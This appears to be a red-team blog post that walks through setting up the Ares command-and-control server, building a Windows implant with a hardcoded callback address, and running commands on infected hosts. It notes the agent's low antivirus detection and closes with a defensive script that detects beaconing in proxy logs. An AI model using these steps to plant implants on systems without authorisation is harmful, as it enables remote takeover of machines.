The high demand for Red Team assessments has increased the interest of security companies and consultants in developing command and control tools with different capabilities. Some of these tools can be used in official engagements, while others have been developed only for research purposes.

Ares is a command and control tool written in Python and developed by Kevin Locati. Its web interface runs on port 8080 and is protected by a password and a passphrase. The database must be created before the server is started.

./ares.py initdb
./ares.py runserver -h 0.0.0.0 -p 8080 --threaded
Ares – Server
Ares – Password Setup

Once the password is set, Ares will ask for a passphrase to be used.

Ares – Passphrase

The main interface of Ares contains only three functions:

  1. Agent List
  2. Change Password
  3. Disconnect

The Agent List is the page where all the infected hosts running the implant will appear.

Ares – Main Interface

The config.py file in the agent folder controls the settings of the agent. Before anything else, the SERVER variable must be changed to the IP address on which the command and control server is running.

Ares – Agent Configuration

If Wine is installed (the Ares repository contains a Wine setup script), the agent can be built as an executable by running the following command:

./builder.py -p Windows --server http://192.168.1.203:8080 -o agent.exe
Ares – Creating Agent

Hosts that are running the agent will appear in the agent list in the following format.

Ares – List of Agents

Commands can be executed on the target hosts from an input field, and the output is retrieved in a console window.

Ares – Command Execution – ipconfig
Ares – Command Execution – List of Users

Apart from basic command execution on the target host, Ares doesn’t offer other capabilities. However, at the time of writing the agent has a low detection rate against a number of antivirus products.

Agent – Detection Rate
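
The builder bakes a plain-HTTP server address on a bare IP and port (http://192.168.1.203:8080 above) into the agent, which gives defenders a network-side signal that does not depend on antivirus coverage. The following is an added example, not part of the original post or of Ares itself: it scans constructed proxy-log lines for hosts polling such a destination at regular intervals. The log format, URL paths and thresholds are assumptions, as is the premise that the agent checks in on a steady timer.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample proxy log lines: timestamp, client IP, method, URL.
# The /poll, /status and other paths are placeholders, not Ares' real endpoints.
SAMPLE_LOG = """\
2024-01-10T09:00:00 10.0.0.21 GET http://192.168.1.203:8080/poll
2024-01-10T09:00:10 10.0.0.21 GET http://192.168.1.203:8080/poll
2024-01-10T09:00:20 10.0.0.21 GET http://192.168.1.203:8080/poll
2024-01-10T09:00:31 10.0.0.21 GET http://192.168.1.203:8080/poll
2024-01-10T09:00:40 10.0.0.21 GET http://192.168.1.203:8080/poll
2024-01-10T09:00:05 10.0.0.34 GET http://intranet.example.com:8080/index.html
2024-01-10T09:03:47 10.0.0.34 GET http://intranet.example.com:8080/app.js
2024-01-10T09:00:02 10.0.0.35 GET http://192.168.1.50:8080/status
2024-01-10T09:07:30 10.0.0.35 GET http://192.168.1.50:8080/status
"""

# Plain HTTP to a bare IPv4 address with an explicit port, as in the builder's --server value.
BARE_IP_URL = re.compile(r"^http://(\d{1,3}(?:\.\d{1,3}){3}):(\d+)(?:/|$)")

def find_beacons(log_text, min_requests=5, max_jitter=2.0):
    """Return (client, dest, mean_interval) for regular polling to bare-IP HTTP servers."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines
        ts, client, _method, url = parts
        m = BARE_IP_URL.match(url)
        if m:
            seen[(client, f"{m.group(1)}:{m.group(2)}")].append(datetime.fromisoformat(ts))
    hits = []
    for (client, dest), times in sorted(seen.items()):
        if len(times) < min_requests:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        # Low standard deviation between requests suggests automated polling, not browsing.
        if statistics.pstdev(gaps) <= max_jitter:
            hits.append((client, dest, statistics.mean(gaps)))
    return hits

if __name__ == "__main__":
    for client, dest, interval in find_beacons(SAMPLE_LOG):
        print(f"{client} -> {dest} every ~{interval:.0f}s")
```

The thresholds are starting points only; tune `min_requests` and `max_jitter` against a baseline of known-good internal services that also listen on bare IPs.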
